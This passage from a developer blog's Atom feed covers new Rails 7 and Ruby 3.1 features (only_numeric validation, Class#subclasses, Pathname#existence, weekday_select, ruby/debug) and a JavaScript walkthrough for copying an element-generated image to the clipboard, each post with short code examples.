      <updated>2022-01-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-only_numeric-option-to-numericality-validator</id>
      <content type="html"><![CDATA[<p>Rails 7.0.1 introduces the <code>only_numeric</code> option for the numericality validator, which specifies whether the value has to be an instance of <code>Numeric</code>. The default behavior is to attempt parsing the value if it is a <code>String</code>.</p><p>When the database field is a float column, the data will get serialized to the correct type. In the case of a JSON column, serialization doesn't take place, so a string value can pass the validation.</p><p>As a resolution, Rails 7 has added the <code>only_numeric</code> option to the numericality validator.</p><p>We will see it in action.</p><p>To demonstrate, we need to generate a table that has a json/jsonb column.</p><pre><code class="language-ruby"># migration
create_table :users do |t|
  t.jsonb :personal
end</code></pre><h3>Before Validation</h3><pre><code class="language-ruby"># Model
class User &lt; ApplicationRecord
  store_accessor :personal, %i[age tooltips]
end</code></pre><pre><code class="language-ruby"># rails console
&gt;&gt; User.create!(age: '29')
=&gt; #&lt;User id: 1, personal: {&quot;age&quot;=&gt;&quot;29&quot;}, created_at: Sun, 16 Jan 2022 14:09:43.045301000 UTC +00:00, updated_at: Sun, 16 Jan 2022 14:09:43.045301000 UTC +00:00&gt;</code></pre><h3>After Validation</h3><pre><code class="language-ruby"># Model
class User &lt; ApplicationRecord
  store_accessor :personal, %i[age tooltips]

  validates_numericality_of :age, only_numeric: true, allow_nil: true
end</code></pre><pre><code class="language-ruby"># rails console
&gt;&gt; User.create!(age: '29')
=&gt; 'raise_validation_error': Validation failed: Age is not a number (ActiveRecord::RecordInvalid)

&gt;&gt; User.create!(age: 29)
=&gt; #&lt;User id: 2, personal: {&quot;age&quot;=&gt;29}, created_at: Sun, 16 Jan 2022 14:15:44.599934000 UTC +00:00, updated_at: Sun, 16 Jan 2022 14:15:44.599934000 UTC +00:00&gt;</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/43914">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3.1 adds Class#subclasses]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-1-adds-class-subclasses"/>
      <updated>2021-12-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-1-adds-class-subclasses</id>
      <content type="html"><![CDATA[<p>Ruby 3.1 introduces the <code>Class#subclasses</code> method, which returns all classes directly inheriting from the receiver, without including singleton classes.</p><p>We can see many implementations for calculating all subclasses of a particular class in the Ruby community across different gems. The <a href="https://api.rubyonrails.org/classes/ActiveSupport/DescendantsTracker.html#method-c-subclasses">ActiveSupport::DescendantsTracker</a> is one such implementation, used in the Rails framework. Finally, Ruby has added a native <code>Class#subclasses</code> implementation in its 3.1 release.</p><h2>After Ruby 3.1</h2><pre><code class="language-ruby">=&gt; class User; end
=&gt; class Employee &lt; User; end
=&gt; class Client &lt; User; end
=&gt; class Manager &lt; Employee; end
=&gt; class Developer &lt; Employee; end

=&gt; User.subclasses
=&gt; [Employee, Client]

=&gt; Employee.subclasses
=&gt; [Manager, Developer]

=&gt; Developer.subclasses
=&gt; []</code></pre><p>Here's the relevant <a href="https://github.com/ruby/ruby/pull/5045">pull request</a> and <a href="https://bugs.ruby-lang.org/issues/18273">feature discussion</a> for this change.</p>]]></content>
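Before Ruby 3.1, one common community-style approach was to scan live classes ourselves. Below is a rough, illustrative sketch of such an implementation; the helper name `direct_subclasses` is our own, not from Ruby or Rails:

```ruby
# Rough pre-3.1 stand-in for Class#subclasses: scan every live class and
# keep those whose direct superclass is the receiver, skipping singleton
# classes. ObjectSpace scans are slow, so this is illustrative only.
def direct_subclasses(klass)
  ObjectSpace.each_object(Class).select do |c|
    !c.singleton_class? && c.superclass == klass
  end
end

class User; end
class Employee < User; end
class Client < User; end
class Manager < Employee; end

direct_subclasses(User).map(&:name).sort
# => ["Client", "Employee"]
```

On Ruby 3.1 and later, `User.subclasses` should return the same classes natively (ordering aside), without the ObjectSpace scan.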
    </entry><entry>
       <title><![CDATA[Generating an image from an element and copying it to the clipboard using JavaScript]]></title>
       <author><name>Rishi Mohan</name></author>
      <link href="https://www.bigbinary.com/blog/copy-generated-image-clipboard-javascript"/>
      <updated>2021-12-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/copy-generated-image-clipboard-javascript</id>
      <content type="html"><![CDATA[<p>While most browsers support the <code>navigator.clipboard.writeText</code> method, which is used to write a string to the clipboard, it gets a little tricky when you want to copy an image to the clipboard. There's no common way to copy a blob image to the clipboard across all browsers.</p><p>While working on an app that <a href="https://kizie.co/tools/twitter-image">generates an image from a tweet</a> and lets you save it, I wanted to add the ability to let users copy the image directly to the clipboard. The implementation seemed simple until I started working on it. The problem is that browsers have different specs for writing a blob to the clipboard.</p><p>In this article, we'll learn to write a function that generates an image from an element and saves it to the clipboard. Also, since browsers handle things differently, we'll see how to make copying an image to the clipboard work on Safari and Chrome (and its variants).</p><h2>Things to know before we start</h2><ul><li>Unfortunately, there's no way (or I haven't found one) to copy a blob image to the clipboard in Firefox.</li><li>There's no way to copy multiple images in one go.</li></ul><h2>Creating an image from an element</h2><p>Below is a function that utilises the <code>domtoimage</code> library to return an image blob from the element <code>screenshotRef.current</code>.</p><p>We can use <code>yarn add dom-to-image</code> to install the package.</p><p>Instead of <code>screenshotRef.current</code> used in the function, we can pass the <code>id</code> or <code>className</code> of the element we want to generate the image from. More about how domtoimage works can be learned <a href="https://github.com/tsayen/dom-to-image">here</a>.</p><pre><code class="language-js">const snapshotCreator = () =&gt; {
  return new Promise((resolve, reject) =&gt; {
    try {
      const scale = window.devicePixelRatio;
      const element = screenshotRef.current; // You can use element's ID or Class here
      domtoimage
        .toBlob(element, {
          height: element.offsetHeight * scale,
          width: element.offsetWidth * scale,
          style: {
            transform: &quot;scale(&quot; + scale + &quot;)&quot;,
            transformOrigin: &quot;top left&quot;,
            width: element.offsetWidth + &quot;px&quot;,
            height: element.offsetHeight + &quot;px&quot;,
          },
        })
        .then((blob) =&gt; {
          resolve(blob);
        });
    } catch (e) {
      reject(e);
    }
  });
};</code></pre><h2>Copying an image to clipboard in Safari</h2><p>First, we'll need a check to see if the browser is Safari. You can use the check below to detect Safari.</p><pre><code class="language-js">const isSafari = /^((?!chrome|android).)*safari/i.test(
  navigator?.userAgent
);</code></pre><p>Now that we have the check, we can use the function below to copy the image to the clipboard.</p><pre><code class="language-js">const copyImageToClipBoardSafari = () =&gt; {
  if (isSafari) {
    navigator.clipboard
      .write([
        new ClipboardItem({
          &quot;image/png&quot;: new Promise(async (resolve, reject) =&gt; {
            try {
              const blob = await snapshotCreator();
              resolve(new Blob([blob], { type: &quot;image/png&quot; }));
            } catch (err) {
              reject(err);
            }
          }),
        }),
      ])
      .then(() =&gt; {
        // Success
      })
      .catch((err) =&gt; {
        // Error
        console.error(&quot;Error:&quot;, err);
      });
  }
};</code></pre><p>We're using the <code>navigator.clipboard.write</code> method to write an image blob to the clipboard. Inside it, we're creating a new ClipboardItem from the blob of the element, which is generated by the <code>snapshotCreator()</code> function we created in the first step.</p><h2>Copying an image to clipboard in other browsers</h2><p>Since this method doesn't work in Firefox, we'll need a check to make sure we're not running it on Firefox. The condition below takes care of that.</p><pre><code class="language-js">const isNotFirefox = navigator.userAgent.indexOf(&quot;Firefox&quot;) &lt; 0;</code></pre><p>Now that we have the check, we'll use the same technique as we used for Safari, but this time we'll need to ask the browser for the <code>navigator</code> permissions.</p><p>Below is the function that does that and then copies the blob image to the clipboard in the Chrome browser and its variants.</p><pre><code class="language-js">const copyImageToClipBoardOtherBrowsers = () =&gt; {
  if (isNotFirefox) {
    navigator?.permissions
      ?.query({ name: &quot;clipboard-write&quot; })
      .then(async (result) =&gt; {
        if (result.state === &quot;granted&quot;) {
          const type = &quot;image/png&quot;;
          const blob = await snapshotCreator();
          let data = [new ClipboardItem({ [type]: blob })];
          navigator.clipboard
            .write(data)
            .then(() =&gt; {
              // Success
            })
            .catch((err) =&gt; {
              // Error
              console.error(&quot;Error:&quot;, err);
            });
        }
      });
  } else {
    alert(&quot;Firefox does not support this functionality&quot;);
  }
};</code></pre><p>The difference is not much, except that Chrome and its variants require asking for <code>navigator.permissions</code> before we can write the blob content to the clipboard. The above function uses the same <code>snapshotCreator()</code> function from the first step to create an image from the element.</p><p>We can combine both functions to have this functionality work in Safari and the Chrome browser. You can check how it works on <a href="https://kizie.co/tools/twitter-image">this page</a>; just click on the &quot;Copy Image&quot; button and then you'll be able to paste the image anywhere.</p>]]></content>
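The post describes combining both functions by branching on the browser, but doesn't show the dispatch itself. Here is a small, hedged sketch of that branching; the function name `pickCopyStrategy` and the returned labels are our own illustration, not part of the original code:

```javascript
// Decide which clipboard-copy path to take, given a user-agent string.
// "safari"           -> use the ClipboardItem-with-Promise approach
// "permission-based" -> query the clipboard-write permission, then write
// "unsupported"      -> Firefox has no blob-image clipboard path here
const pickCopyStrategy = (userAgent) => {
  const isSafari = /^((?!chrome|android).)*safari/i.test(userAgent);
  if (isSafari) return "safari";
  if (userAgent.indexOf("Firefox") >= 0) return "unsupported";
  return "permission-based";
};
```

A combined click handler could then call `copyImageToClipBoardSafari()` or `copyImageToClipBoardOtherBrowsers()` based on the returned label.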
    </entry><entry>
       <title><![CDATA[Rails 7 adds Pathname#existence]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-pathname-existence"/>
      <updated>2021-12-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-pathname-existence</id>
      <content type="html"><![CDATA[<p>Rails 7 introduces the <a href="https://api.rubyonrails.org/classes/Pathname.html#method-i-existence"><code>Pathname#existence</code></a> method, which returns the receiver if the given file path exists, and otherwise returns nil.</p><h3>Before</h3><p>We first need to check whether the given file path exists before performing any other operations on it.</p><pre><code class="language-ruby">=&gt; file_path = &quot;config/schedule.yml&quot;
=&gt; Pathname.new(file_path).read if Pathname.new(file_path).exist?</code></pre><h3>Rails 7 onwards</h3><p>The <code>Pathname#existence</code> method acts like <code>Object#presence</code>, but for file existence.</p><pre><code class="language-ruby">=&gt; file_path = &quot;config/schedule.yml&quot;
=&gt; Pathname.new(file_path).existence&amp;.read</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/43726">pull request</a> for more details.</p>]]></content>
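For codebases not yet on Rails 7, the helper can be approximated with a tiny monkey patch. This is our own illustrative backport modeled on the `Object#presence` pattern, not the exact Rails implementation:

```ruby
require "pathname"
require "tempfile"

# Illustrative backport: return the Pathname itself when the file exists,
# nil otherwise, mirroring how Object#presence behaves for blank values.
class Pathname
  def existence
    self if exist?
  end
end

file = Tempfile.new("schedule")
file.write("interval: daily")
file.flush

Pathname.new(file.path).existence&.read  # => "interval: daily"
Pathname.new("/no/such/file").existence  # => nil
```

With this in place, the `Pathname.new(file_path).existence&.read` idiom works the same way it does on Rails 7.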
    </entry><entry>
       <title><![CDATA[Fix slow page loads in a Ruby on Rails application by identifying n+1 queries]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/fix-slow-page-loads-in-a-ruby-on-rails-application"/>
      <updated>2021-12-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/fix-slow-page-loads-in-a-ruby-on-rails-application</id>
      <content type="html"><![CDATA[<p>In one of our internal products, we received complaints about slow page loads and longer response times on a specific page. Our team members used New Relic to identify the cause of the slowness and resolve the issue. After the issue was resolved, I made a video for internal purposes. In this blog we are posting that video as it was recorded.</p><p>&lt;iframe width=&quot;100%&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/pmCcey4BiG0&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds accepts_nested_attributes_for support for delegated_type]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-accepts-nested-attributes-for-support-for-delegated_type"/>
      <updated>2021-11-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-accepts-nested-attributes-for-support-for-delegated_type</id>
      <content type="html"><![CDATA[<p>Rails 6.1 introduced <code>delegated_type</code> to Active Record, which makes it easier for models to share responsibilities. Please see our <a href="https://www.bigbinary.com/blog/rails-6-1-adds-delegated-type-to-active-record">blog</a> to read more about <code>delegated_type</code>.</p><pre><code class="language-ruby">class Entry &lt; ApplicationRecord
  # Schema
  #  entryable_type, entryable_id, ...
  delegated_type :entryable, types: %w[ Message Comment ]
end

class Message
  # Schema
  #  subject, ...
end

class Comment
  # Schema
  #  content, ...
end</code></pre><p>The <code>accepts_nested_attributes_for</code> option is very helpful while handling nested forms. We can easily create and update associated records by passing their details along with the main object parameters when the <code>accepts_nested_attributes_for</code> option is enabled.</p><h3>Before</h3><p>The <code>accepts_nested_attributes_for</code> option is not available for <code>delegated_type</code>, hence we can't use nested forms for associated objects configured via <code>delegated_type</code>.</p><h3>Rails 7 onwards</h3><p>Rails 7 adds <code>accepts_nested_attributes_for</code> support to <code>delegated_type</code>, which allows us to create and update records easily without needing to write specific methods or logic.</p><pre><code class="language-ruby">class Entry &lt; ApplicationRecord
  delegated_type :entryable, types: %w[ Message Comment ]
  accepts_nested_attributes_for :entryable
end

params = {
  entry: {
    entryable_type: 'Message',
    entryable_attributes: { subject: 'Delegated Type' }
  }
}
message_entry = Entry.create(params[:entry])

params = {
  entry: {
    entryable_type: 'Comment',
    entryable_attributes: { content: 'Looks Cool!' }
  }
}
comment_entry = Entry.create(params[:entry])</code></pre><p>If we want to deal with more logic or validations while creating the entryable objects, we'll have to create a specific method and put the logic there.</p><pre><code class="language-ruby">class Entry &lt; ApplicationRecord
  def self.create_with_comment(content)
    # Validation logic goes here
    create! entryable: Comment.new(content: content)
  end
end</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/41717">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 Adds from option to ActiveSupport::TestCase#assert_no_changes]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-from-option-to-assert_no_changes"/>
      <updated>2021-11-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-from-option-to-assert_no_changes</id>
      <content type="html"><![CDATA[<p>Rails <a href="https://guides.rubyonrails.org/active_support_core_extensions.html">Active Support</a> provides various extensions, utilities, and helpers: a collection of utility classes and standard library extensions that are very useful.</p><p>Rails 5.1 introduced <code>assert_no_changes</code> and <code>assert_changes</code>, making it easier to observe changes. Using <a href="https://api.rubyonrails.org/classes/ActiveSupport/Testing/Assertions.html#method-i-assert_no_changes">ActiveSupport::TestCase#assert_no_changes</a> we can easily assert that the result of evaluating an expression has not changed before and after calling the passed block.</p><p>To assert an expected change in the value of an object, we can use <code>assert_changes</code>.</p><pre><code class="language-ruby">assert_changes -&gt; { user.address } do
  user.update address: 'Miami'
end</code></pre><p><code>assert_changes</code> also supports the <code>from</code> and <code>to</code> options.</p><pre><code class="language-ruby">assert_changes -&gt; { user.address }, from: 'San Francisco', to: 'Miami' do
  user.update address: 'Miami'
end</code></pre><p>Similarly, <code>assert_no_changes</code> allows us to assert that a value is expected not to change.</p><pre><code class="language-ruby">assert_no_changes -&gt; { user.address } do
  user.update address: 'Miami'
end</code></pre><p>We can also specify an error message with <code>assert_no_changes</code>.</p><pre><code class="language-ruby">assert_no_changes -&gt; { user.address }, 'Expect the address to not change' do
  user.update address: 'Miami'
end</code></pre><h3>Before</h3><p><code>assert_no_changes</code> did not support the <code>from</code> option the way <code>assert_changes</code> does.</p><pre><code class="language-ruby">assert_no_changes -&gt; { user.address } do
  user.update address: 'Miami'
end</code></pre><p>However, <a href="https://github.com/rails/rails/pull/42277">Rails 7 has added the from: option to ActiveSupport::TestCase#assert_no_changes</a>, allowing us to assert on the initial value that is expected to not change.</p><h3>Rails 7 onwards</h3><p>The optional <code>from</code> argument specifies the expected initial value.</p><pre><code class="language-ruby">assert_no_changes -&gt; { user.address }, from: 'San Francisco' do
  user.update address: 'Miami'
end</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/42277">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3.1 adds MatchData#match & MatchData#match_length]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-1-adds-match-data-methods"/>
      <updated>2021-11-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-1-adds-match-data-methods</id>
      <content type="html"><![CDATA[<p>Ruby 3.1 introduces the <code>MatchData#match</code> &amp; <code>MatchData#match_length</code> methods, which return the substring matched against a regular expression &amp; its length, respectively.</p><pre><code class="language-ruby">=&gt; str = &quot;Ruby 3.1 introduces MatchData#match method&quot;
=&gt; m = /(?&lt;lang&gt;\S+)(\s)(?&lt;version&gt;[\d\.]+)/.match(str)
=&gt; #&lt;MatchData &quot;Ruby 3.1&quot; lang:&quot;Ruby&quot; version:&quot;3.1&quot;&gt;</code></pre><h3>Before Ruby 3.1</h3><p>We have the <code>MatchData#[]</code> method to access all the substring groups that are matched. We can access either a single match or multiple matches by giving a single index or a range of indexes, respectively, using the <code>MatchData#[]</code> method.</p><pre><code class="language-ruby">=&gt; m[:lang]
=&gt; &quot;Ruby&quot;
=&gt; m[1]
=&gt; &quot;Ruby&quot;
=&gt; m[:version]
=&gt; &quot;3.1&quot;
=&gt; m[0..2]
=&gt; [&quot;Ruby 3.1&quot;, &quot;Ruby&quot;, &quot;3.1&quot;]
=&gt; m[1..2]
=&gt; [&quot;Ruby&quot;, &quot;3.1&quot;]
=&gt; m[0].length
=&gt; 8</code></pre><h3>After Ruby 3.1</h3><p>We now have two new methods to access the match data &amp; its length. The <code>MatchData#match</code> &amp; <code>MatchData#match_length</code> methods accept either an index or a symbol as an argument to return the match data &amp; its length.</p><pre><code class="language-ruby">=&gt; m.match(0)
=&gt; &quot;Ruby 3.1&quot;
=&gt; m.match(:version)
=&gt; &quot;3.1&quot;
=&gt; m.match(3)
=&gt; nil
=&gt; m.match_length(0)
=&gt; 8
=&gt; m.match_length(:version)
=&gt; 3
=&gt; m.match_length(3)
=&gt; nil</code></pre><p>Please note that <code>MatchData#match</code> is not the same as the <code>MatchData#[]</code> method. The latter accepts an optional length or range as an argument to return the matched data, but the former doesn't; it allows only a single index or symbol as an argument.</p><p>Here's the relevant <a href="https://github.com/ruby/ruby/pull/4851">pull request</a> and <a href="https://bugs.ruby-lang.org/issues/18172">feature discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 replaced byebug with ruby/debug]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-replaced-byebug-with-ruby-debug"/>
      <updated>2021-11-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-replaced-byebug-with-ruby-debug</id>
      <content type="html"><![CDATA[<p>Rails 5 introduced <a href="https://github.com/deivid-rodriguez/byebug">byebug</a>, which is an easy-to-use, feature-rich Ruby debugger. It offers features like <code>Stepping</code>, <code>Breaking</code>, <code>Evaluating</code>, and <code>Tracking</code>.</p><p>Using <a href="https://github.com/deivid-rodriguez/byebug">byebug</a> we can easily control the execution of a program and use the debug inspector for call stack navigation. This allows us to handle and track the execution flow.</p><p>Here is the <a href="https://guides.rubyonrails.org/debugging_rails_applications.html#debugging-with-the-byebug-gem">byebug documentation</a> and here is the <a href="https://github.com/rails/rails/pull/14646">pull request</a> where it was added.</p><p><a href="https://github.com/rails/rails/pull/43187">Rails 7 is replacing byebug with ruby/debug</a>. <code>debug</code> is Ruby's new debugger, which will be included in Ruby 3.1. To align Rails with Ruby, <code>debug</code> has been added to Rails 7.</p><p>Let's see an example of debugging with both byebug and debug.</p><h3>Before</h3><p>Let's assume we have a <code>NameController</code>. Inside any Rails application, you can call the debugger by calling the <code>byebug</code> method.</p><pre><code class="language-ruby"># app/controllers/name_controller.rb
class NameController &lt; ApplicationController
  def index
    name = &quot;John Doe&quot;
    byebug # Call to debugger
    city = &quot;San Francisco&quot;
  end
end</code></pre><p>Then the invoked debugger results in the following.</p><pre><code class="language-ruby">[1, 7] in app/controllers/name_controller.rb
   1: class NameController &lt; ApplicationController
   2:   def index
   3:     name = &quot;John Doe&quot;
   4:     byebug # Call to debugger
=&gt; 5:     city = &quot;San Francisco&quot;
   6:   end
   7: end
(byebug) name # variable call
&quot;John Doe&quot;</code></pre><h3>Rails 7 onwards</h3><p>We can use the <code>binding.break</code> method for calling ruby/debug.</p><pre><code class="language-ruby"># app/controllers/name_controller.rb
class NameController &lt; ApplicationController
  def index
    name = &quot;John Doe&quot;
    binding.break # Call to debugger
    city = &quot;San Francisco&quot;
  end
end</code></pre><p>The invoked debugger results in the following.</p><pre><code class="language-ruby">[1, 7] in app/controllers/name_controller.rb
   1| class NameController &lt; ApplicationController
   2|   def index
   3|     name = &quot;John Doe&quot;
   4|     binding.break # Call to debugger
&gt;  5|     city = &quot;San Francisco&quot;
   6|   end
   7| end
=&gt;#0  NameController#index at ~/demo_app/app/controllers/name_controller.rb:5
  #1  ActionController::BasicImplicitRender#send_action(method=&quot;index&quot;, args=[])
(rdbg) name # variable call
&quot;John Doe&quot;</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/43187">pull request</a> for more details; for the commands and features of ruby/debug, please visit <a href="https://github.com/ruby/debug">ruby/debug</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds weekday_options_for_select and weekday_select]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-weekday_options_for_select-and-weekday_select"/>
      <updated>2021-11-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-weekday_options_for_select-and-weekday_select</id>
      <content type="html"><![CDATA[<p>In web applications, forms are one of the most essential interfaces for user input, and it can be tedious to write and maintain form markup with many attributes. Rails provides <a href="https://guides.rubyonrails.org/form_helpers.html">Action View Form Helpers</a> for generating form markup.</p><p>Using the <a href="https://guides.rubyonrails.org/form_helpers.html#making-select-boxes-with-ease">select</a> helper we can easily create select boxes in HTML, with one <code>&lt;option&gt;</code> element for each option to choose from.</p><p>For example, let's say we have a list of cities for the user to choose from.</p><pre><code class="language-ruby"># app/views/address/new.html.erb
&lt;%= form.select :city, [&quot;Pune&quot;, &quot;Mumbai&quot;, &quot;Delhi&quot;] %&gt;</code></pre><p>Rails will generate the following markup.</p><pre><code class="language-html">&lt;select name=&quot;city&quot; id=&quot;city&quot;&gt;
  &lt;option value=&quot;Pune&quot;&gt;Pune&lt;/option&gt;
  &lt;option value=&quot;Mumbai&quot;&gt;Mumbai&lt;/option&gt;
  &lt;option value=&quot;Delhi&quot;&gt;Delhi&lt;/option&gt;
&lt;/select&gt;</code></pre><p>Previously, to generate a select box for weekday selection, we needed to write a custom helper; Rails did not have anything out of the box for weekday selection.</p><p>However, <a href="https://github.com/rails/rails/pull/42979">Rails 7 has added weekday_options_for_select and weekday_select</a>, using which we can easily generate a dropdown field for selecting a weekday.</p><h3>Before</h3><p>In Rails 6.1, we can create a dropdown field for weekdays as shown here.</p><pre><code class="language-ruby"># app/views/users/new.html.erb
&lt;%= form_with(model: user) do |form| %&gt;
  &lt;div class=&quot;field&quot;&gt;
    &lt;%= form.label :weekly_off %&gt;
    &lt;%= form.select :weekly_off, I18n.t('date.day_names') %&gt;
  &lt;/div&gt;
&lt;% end %&gt;</code></pre><p>Or we can do something like this.</p><pre><code class="language-ruby"># app/views/users/new.html.erb
&lt;%= form_with(model: user) do |form| %&gt;
  &lt;div class=&quot;field&quot;&gt;
    &lt;%= form.label :weekly_off %&gt;
    &lt;%= form.select :weekly_off, I18n.t('date.day_names').map.with_index.to_h %&gt;
  &lt;/div&gt;
&lt;% end %&gt;</code></pre><p>Then the generated markup looks like this.</p><pre><code class="language-html">&lt;select name=&quot;user[weekly_off]&quot; id=&quot;user_weekly_off&quot;&gt;
  &lt;option value=&quot;Sunday&quot;&gt;Sunday&lt;/option&gt;
  &lt;option value=&quot;Monday&quot;&gt;Monday&lt;/option&gt;
  &lt;option value=&quot;Tuesday&quot;&gt;Tuesday&lt;/option&gt;
  &lt;option value=&quot;Wednesday&quot;&gt;Wednesday&lt;/option&gt;
  &lt;option value=&quot;Thursday&quot;&gt;Thursday&lt;/option&gt;
  &lt;option value=&quot;Friday&quot;&gt;Friday&lt;/option&gt;
  &lt;option value=&quot;Saturday&quot;&gt;Saturday&lt;/option&gt;
&lt;/select&gt;</code></pre><p>Here is how it would look if we go with the second option.</p><pre><code class="language-html">&lt;select name=&quot;user[weekly_off]&quot; id=&quot;user_weekly_off&quot;&gt;
  &lt;option value=&quot;0&quot;&gt;Sunday&lt;/option&gt;
  &lt;option value=&quot;1&quot;&gt;Monday&lt;/option&gt;
  &lt;option value=&quot;2&quot;&gt;Tuesday&lt;/option&gt;
  &lt;option value=&quot;3&quot;&gt;Wednesday&lt;/option&gt;
  &lt;option value=&quot;4&quot;&gt;Thursday&lt;/option&gt;
  &lt;option value=&quot;5&quot;&gt;Friday&lt;/option&gt;
  &lt;option value=&quot;6&quot;&gt;Saturday&lt;/option&gt;
&lt;/select&gt;</code></pre><h3>Rails 7 onwards</h3><p>We can use the <code>weekday_options_for_select</code> or <code>weekday_select</code> helper to generate a dropdown field for selecting a weekday.</p><pre><code class="language-ruby"># app/views/users/new.html.erb
&lt;%= form_with(model: user) do |form| %&gt;
  &lt;div class=&quot;field&quot;&gt;
    &lt;%= form.label :weekly_off %&gt;
    &lt;%= form.select :weekly_off, weekday_options_for_select(&quot;Monday&quot;) %&gt;
  &lt;/div&gt;
&lt;% end %&gt;</code></pre><p>Or we can do something like this.</p><pre><code class="language-ruby"># app/views/users/new.html.erb
&lt;%= form_with(model: user) do |form| %&gt;
  &lt;div class=&quot;field&quot;&gt;
    &lt;%= form.label :weekly_off %&gt;
    &lt;%= form.weekday_select :weekly_off, { selected: &quot;Monday&quot; } %&gt;
  &lt;/div&gt;
&lt;% end %&gt;</code></pre><p>Then the generated markup looks like this.</p><pre><code class="language-html">&lt;select name=&quot;user[weekly_off]&quot; id=&quot;user_weekly_off&quot;&gt;
  &lt;option value=&quot;Sunday&quot;&gt;Sunday&lt;/option&gt;
  &lt;option selected=&quot;selected&quot; value=&quot;Monday&quot;&gt;Monday&lt;/option&gt;
  &lt;option value=&quot;Tuesday&quot;&gt;Tuesday&lt;/option&gt;
  &lt;option value=&quot;Wednesday&quot;&gt;Wednesday&lt;/option&gt;
  &lt;option value=&quot;Thursday&quot;&gt;Thursday&lt;/option&gt;
  &lt;option value=&quot;Friday&quot;&gt;Friday&lt;/option&gt;
  &lt;option value=&quot;Saturday&quot;&gt;Saturday&lt;/option&gt;
&lt;/select&gt;</code></pre><p><code>weekday_options_for_select</code> accepts a few options, and all of them have a default value.</p><p><code>selected</code> defaults to nil; if we provide this argument, the value passed will be used as the selected option.</p><pre><code class="language-html">&lt;!-- weekday_options_for_select(&quot;Friday&quot;) --&gt;
&lt;option value=&quot;Sunday&quot;&gt;Sunday&lt;/option&gt;
&lt;option value=&quot;Monday&quot;&gt;Monday&lt;/option&gt;
&lt;option value=&quot;Tuesday&quot;&gt;Tuesday&lt;/option&gt;
&lt;option value=&quot;Wednesday&quot;&gt;Wednesday&lt;/option&gt;
&lt;option value=&quot;Thursday&quot;&gt;Thursday&lt;/option&gt;
&lt;option selected=&quot;selected&quot; value=&quot;Friday&quot;&gt;Friday&lt;/option&gt;
&lt;option value=&quot;Saturday&quot;&gt;Saturday&lt;/option&gt;</code></pre><p><code>index_as_value</code> defaults to false; if true, it will set the value of each option to the index of that day.</p><pre><code class="language-html">&lt;!-- weekday_options_for_select(index_as_value: true) --&gt;
&lt;option value=&quot;0&quot;&gt;Sunday&lt;/option&gt;
&lt;option value=&quot;1&quot;&gt;Monday&lt;/option&gt;
&lt;option value=&quot;2&quot;&gt;Tuesday&lt;/option&gt;
&lt;option value=&quot;3&quot;&gt;Wednesday&lt;/option&gt;
&lt;option value=&quot;4&quot;&gt;Thursday&lt;/option&gt;
&lt;option value=&quot;5&quot;&gt;Friday&lt;/option&gt;
&lt;option value=&quot;6&quot;&gt;Saturday&lt;/option&gt;</code></pre><p><code>day_format</code> defaults to :day_names; passing a different <code>I18n</code> key will use a different format for the option display names and their values.</p><pre><code class="language-html">&lt;!-- weekday_options_for_select(day_format: :abbr_day_names) --&gt;
&lt;option value=&quot;Sun&quot;&gt;Sun&lt;/option&gt;
&lt;option value=&quot;Mon&quot;&gt;Mon&lt;/option&gt;
&lt;option value=&quot;Tue&quot;&gt;Tue&lt;/option&gt;
&lt;option value=&quot;Wed&quot;&gt;Wed&lt;/option&gt;
&lt;option value=&quot;Thu&quot;&gt;Thu&lt;/option&gt;
&lt;option value=&quot;Fri&quot;&gt;Fri&lt;/option&gt;
&lt;option value=&quot;Sat&quot;&gt;Sat&lt;/option&gt;</code></pre><p>Note that the <code>:abbr_day_names</code> options are built into Rails, but we can also define our own array.</p><p>Check out this <a href="https://github.com/rails/rails/pull/42979">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds ActiveRecord::Base#previously_persisted?]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-activerecord-previously_persisted"/>
      <updated>2021-11-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-activerecord-previously_persisted</id>
